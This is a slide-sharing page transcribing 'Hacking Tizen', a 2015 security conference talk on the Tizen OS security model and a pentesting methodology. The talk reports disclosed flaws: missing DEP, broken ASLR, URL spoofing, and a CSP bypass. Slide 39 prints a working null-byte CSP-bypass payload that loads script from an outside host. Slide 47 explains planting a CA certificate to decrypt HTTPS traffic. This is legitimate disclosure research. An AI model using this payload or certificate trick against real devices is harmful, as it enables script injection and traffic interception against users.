Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Ajin Abraham
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentAjin Abraham
 
Exploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginnersExploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginnersAjin Abraham
 
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013Ajin Abraham
 
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013Ajin Abraham
 
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...Ajin Abraham
 
Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012 Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012 Ajin Abraham
 
Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+Ajin Abraham
 
Phishing With Data URI
Phishing With Data URIPhishing With Data URI
Phishing With Data URIAjin Abraham
 
Buffer overflow for Beginners
Buffer overflow for BeginnersBuffer overflow for Beginners
Buffer overflow for BeginnersAjin Abraham
 

More from Ajin Abraham (14)

Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
Nullcon Goa 2016 - Automated Mobile Application Security Testing with Mobile ...
 
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP ChainsExploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
Exploit Research and Development Megaprimer: DEP Bypassing with ROP Chains
 
Abusing Google Apps and Data API: Google is My Command and Control Center
Abusing Google Apps and Data API: Google is My Command and Control CenterAbusing Google Apps and Data API: Google is My Command and Control Center
Abusing Google Apps and Data API: Google is My Command and Control Center
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
Exploit Research and Development Megaprimer: mona.py, Exploit Writer's Swiss ...
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Exploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginnersExploit Research and Development Megaprimer: Buffer overflow for beginners
Exploit Research and Development Megaprimer: Buffer overflow for beginners
 
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
OWASP Xenotix XSS Exploit Framework v3 : Nullcon Goa 2013
 
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
 
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
Abusing, Exploiting and Pwning with Firefox Add-ons: OWASP Appsec 2013 Presen...
 
Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012 Xenotix XSS Exploit Framework: Clubhack 2012
Xenotix XSS Exploit Framework: Clubhack 2012
 
Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+Wi-Fi Security with Wi-Fi P+
Wi-Fi Security with Wi-Fi P+
 
Phishing With Data URI
Phishing With Data URIPhishing With Data URI
Phishing With Data URI
 
Buffer overflow for Beginners
Buffer overflow for BeginnersBuffer overflow for Beginners
Buffer overflow for Beginners
 

Recently uploaded

Integumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptIntegumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptshraddhaparab530
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxAnupam32727
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroomSamsung Business USA
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...Nguyen Thanh Tu Collection
 
Oppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmOppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmStan Meyer
 
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxGrade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxkarenfajardo43
 
ClimART Action | eTwinning Project
ClimART Action    |    eTwinning ProjectClimART Action    |    eTwinning Project
ClimART Action | eTwinning Projectjordimapav
 
Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...
Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...
Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...HetalPathak10
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDecoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDhatriParmar
 
Indexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfIndexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfChristalin Nelson
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptxmary850239
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvRicaMaeCastro1
 
4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptxmary850239
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseCeline George
 

Recently uploaded (20)

Integumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.pptIntegumentary System SMP B. Pharm Sem I.ppt
Integumentary System SMP B. Pharm Sem I.ppt
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
BÀI TẬP BỔ TRỢ TIẾNG ANH 11 THEO ĐƠN VỊ BÀI HỌC - CẢ NĂM - CÓ FILE NGHE (GLOB...
 
Mattingly "AI & Prompt Design" - Introduction to Machine Learning"
Mattingly "AI & Prompt Design" - Introduction to Machine Learning"Mattingly "AI & Prompt Design" - Introduction to Machine Learning"
Mattingly "AI & Prompt Design" - Introduction to Machine Learning"
 
Introduction to Research ,Need for research, Need for design of Experiments, ...
Introduction to Research ,Need for research, Need for design of Experiments, ...Introduction to Research ,Need for research, Need for design of Experiments, ...
Introduction to Research ,Need for research, Need for design of Experiments, ...
 
prashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Professionprashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Profession
 
Oppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmOppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and Film
 
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxGrade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
 
ClimART Action | eTwinning Project
ClimART Action    |    eTwinning ProjectClimART Action    |    eTwinning Project
ClimART Action | eTwinning Project
 
Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...
Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...
Satirical Depths - A Study of Gabriel Okara's Poem - 'You Laughed and Laughed...
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptxDecoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
Decoding the Tweet _ Practical Criticism in the Age of Hashtag.pptx
 
Indexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfIndexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdf
 
Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,
 
4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx4.11.24 Poverty and Inequality in America.pptx
4.11.24 Poverty and Inequality in America.pptx
 
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
 
4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 Database
 

Hacking Tizen : The OS of Everything - Nullcon Goa 2015

  • 1. Hacking TIZEN The OS of Everything AJIN ABRAHAM | @ajinabraham
  • 2. whoami • Application Security Engineer ,Yodlee • Blogs at opensecurity.in • Spoken at NULLCON, ClubHack, OWASP AppSec AsiaPac, BlackHat Europe, Ground Zero Summit and few others • Loves to do and learn NEW things.
  • 3. Disclaimer • All Images, Logos and Trademark belongs to their respective owners. • All vulnerabilities discussed are responsibly disclosed to Tizen Security community. • Personal View/Research, doesn’t reflect the views of my employer.
  • 4. Agenda • Hacking Tizen *Android WebApp vs Tizen WebApp * Shellshock * DEP Gone! * ASLR Broken * CSP Bypassed * URL Spoofing/Content Injection • Pentesting Methodology * Static Analysis * Dynamic Analysis * Network Analysis • Security Concerns in Tizen • Conclusion • What is Tizen • Why Tizen? • Types of Tizen Application • Tizen Architecture • Tizen Application Structure • Tizen Security Model • Sandbox - SMACK – Simple Mandatory Access Control • WebKit2 on Tizen • Quick Comparison Android vs Tizen vs iOS
  • 5. TIZEN : The OS of Everything Tizen –A Linux Foundation Project. The Concept of IoT (Internet of Things)
  • 6.
  • 10.
  • 12. Types of Tizen Applications + Native Web Hybrid NATIVE NATIVE + WEB API + WEB API
  • 13. Tizen Architecture Tizen Web Framework (HTML5 + Tizen Web API) Tizen Native Framework (C++ API) FrameworkCoreKernel Linux Kernel & Drivers Tizen Web App .wgt Tizen Native App .tpk
  • 14. Web API = Standard HTML5 + Tizen Device API
  • 15. Tizen Application Structure • Native Apps • Web Apps • Hybrid Apps
  • 17. Native App (.tpk) Install Location .tpk
  • 20. Tizen Security Model • Non root applications • All applications run under same non-root user ID app • Most of the middleware daemons will run as non-root user. • Application sandboxing • All applications are sandboxed by SMACK. • Each application unable to send IPC and sockets, r/w other application files. • Permission Model/Least privilege • All applications will have manifest file describing privileges. • Manifest file describes SMACK labels and rule of the application to get proper privileges • Tizen CSP for Web Apps • Encrypt HTML, JS and CSS stored in Device - Encrypts at Install time and Runtime decryption. • Content Security Framework by McAfee – Provides API for AVs.
  • 21. SMACK : Simple Mandatory Access Control Kernel Web app 1 Native App (uid: app) Native Framework Kernel Web Runtime (uid: app) Some Daemon (uid:root) SMACK LABEL Web app 2 Web1 Web2 Native1 Daemon File System Web1 Web2 Native 1 Basic Rule : “what's mine is mine; what's yours is yours.” SMACK allows you to add controlled exception to this basic rule.
  • 22. SMACK : Simple Mandatory Access Control Kernel SMACK Terms: – Subject  Any Running Process (Have Smack Label) – Object  File, IPC, Sockets, Process – Access  Read (r), Write (w), Execute (e), Append (a) , Lock (l), Transmute (t) -- Label • Just valid ASCII characters with no meaning, “security tag” applied to subjects (i.e., processes) and objects (i.e., filesystem objects, sockets, processes). The label of a running process is called it’s Context. 41,000 SMACK Rules in Tizen 2.2.1 !! From Tizen 3.X: ( Smack Three domain Model, Cynara) https://wiki.tizen.org/wiki/Security:Cynara
  • 23. Native Apps – manifest.xml
  • 24. Web Apps – config.xml
  • 25. WebKit2 on Tizen • Tizen WebApps runs on WebKit2 • New API Layer over WebKit • Supports Split Process Model, Like your Chrome Tabs
  • 26. Quick Comparison Tizen • Users identified by UID (app) • Permission: Manifest.xml & Config.xml • MessagePort IPC using socket • SMACK & CSP • Content Security Framework • Signed by Developer & Distributor Android • Apps identified by UID • Permission : AndroidManifest.xml • Binder IPC using Intents • SELinux • Signed by Developer iOS • All Apps run under user “mobile”. • No permission model. Ask for Permission at Runtime. • Mach Ports/ Distributed Notifications/ Distributed Objects/ AppleEvents & AppleScript/Pasteboard/XPC based IPC • Powerbox, Seatbelt • Signed by Distributor
  • 27. Enough! Let’s Hack Tizen Research Focus • Tizen WebApps • Tizen OS Memory Protection • Tizen CSP and WebKit
  • 28. Android Web App vs Tizen Web App • Tizen Web Apps are powerful and feature rich. • In Android Web Apps in WebView and can interact with Device features using addJavascriptInterface. • In Tizen, It provides Web API that allows to leverage Device features and are restricted using permissions and CSP.
  • 29. Over privileged: Android Web App vs Tizen Web App WebView BLUETOOTH Android Tizen WebApp DEVELOPER EXPOSES API TO BRIDGE BLUETOOTH PERMISSION ADDJAVASCRIPTINTERFACE NFC BLUETOOTH PRIVILEGE NFC PRIVILEGENFC PERMISSION NFCBLUETOOTH BLUETOOTH API NFC API
  • 30. Android Web App vs Tizen Web App WebView BLUETOOTH Android Tizen WebApp DEVELOPER EXPOSES API TO BRIDGE BLUETOOTH PERMISSION ADDJAVASCRIPTINTERFACE NFC BLUETOOTH PRIVILEGE NFC PRIVILEGENFC PERMISSION NFCBLUETOOTH XSS XSS CSP BLUETOOTH API NFC API
  • 32. DEP – Gone! • When Data Execution Prevention is enabled. data on stack should be non-executable. • Prevents Shellcode at Stack from Executing. • But DEP is not seen in action.
  • 33. DEMO
  • 34. • As per documentation ASLR is fully implemented in Tizen 2.1 itself. • Already Broken in Tizen 2.2.1 , discovered by Shuichiro Suzuki • /proc/sys/kernel/randomize_va_space is set to 2 which tell us that ASLR is enabled. • But as the personality value of /proc/self/personality is set to 00040000. which corresponds to (ADDR_NO_RANDOMIZE) disables ASLR. • Issue is patched in Tizen 2.2 by setting /proc/self/personality to 00000000 • PIE (position-independent executable). So this will make all the native application ASLR enabled by default. • But due to implementation issues, it was still found that ASLR is still in broken state. • /proc/<pid>/maps –Address of heap, stack and main modules remain the same. ASLR Broken!
  • 35. DEMO
  • 37. URL Address Spoofing/Content Injection • Open a new window with URL https://facebook.com and assign it to a variable w. • Try to write “<h1>You 've been Hacked</h1>” to DOM using w.document.write() • Focus the window corresponding to w.
  • 38. DEMO
  • 39. CSP Bypass <script> a=document.createElement('script'); a.id='x'; a.src='u0000https://rawgit.com/ajinabraham/PoC/master/script.js'; document.body.appendChild(a); </script> Content-Security-Policy: default-src 'self’; script-src 'self’ ‘unsafe-inline’; • We create a script tag with JavaScript nullbyte prepended to a SCRIPT URL. • Tricks the browser and load the Script from a different domain and Bypass CSP.
  • 40. DEMO
  • 41. Pentesting Methodology • Whitebox: Access to Source and Knowledge about the application • Blackbox: No access to Source and no idea about the application • Static Analysis • Dynamic Analysis • Network Analysis
  • 42. Static Analysis • Certificate Signature Analysis – Developer and Distributor • Manifest Analysis – manifest.xml/config.xml • Unwanted Privileges. • CSP is proper or not. • Smack Labels and Rules • Directories/ Files/DB with chmod 777 access. • Code Review • Weak Encryption, Crypto • Plaintext Information • SSL Overriding • Writing to SD Card / External Storage – World Readable • Sqlite is used so Client Side SQLi.
  • 43. Dynamic Analysis • Run the App in Tizen VM or Web Simulator • Sensitive data shared during IPC, Sensitive files written at Runtime, Temp files etc. • Tools: Dynamic Analyzer much like android ddms/Android Device Monitor, sdb – The adb equivalent for Tizen.
  • 44.
  • 45.
  • 46. Network Analysis • Installing SSL Certificate and HTTPS Traffic Decryption with a Proxy like Burp or Fiddler • OWASP Top 10 Web Risks • XSS + Improper CSP = JavaScript can directly access device functionalities provided permissions are there.
  • 47. Installing CA Certificate for HTTPS Traffic Decryption • Trusted CA Certificates are stored under /etc/ssl/certs • Filename: <8HEXChars.0> in PEM format. • Copy the CA certificate to /etc/ssl/certs and it’s trusted.
  • 48. Security Concerns • WebKit = Bugs!! • WebKit is basically a collection of use-after-frees that somehow manages to render HTML (probably via a buffer overflow in WebGL) -the grugq • HTML Web API is there, Improper CSP and XSS=owned !! • Too much SMACK Rules – High chance that developers will mess up. Will be reduced from Tizen 3.
  • 49. Conclusion • Security Model/Architecture wise they put lot of effort compared to Android or other devices out their. • They made it so complex that people can easily mess up • Looks promising if they can fix similar implementation bugs like this.
  • 50. Thanks! Thanks to my awesome manager Sachin, for all the support and encouragement to carry out this research. @ajinabraham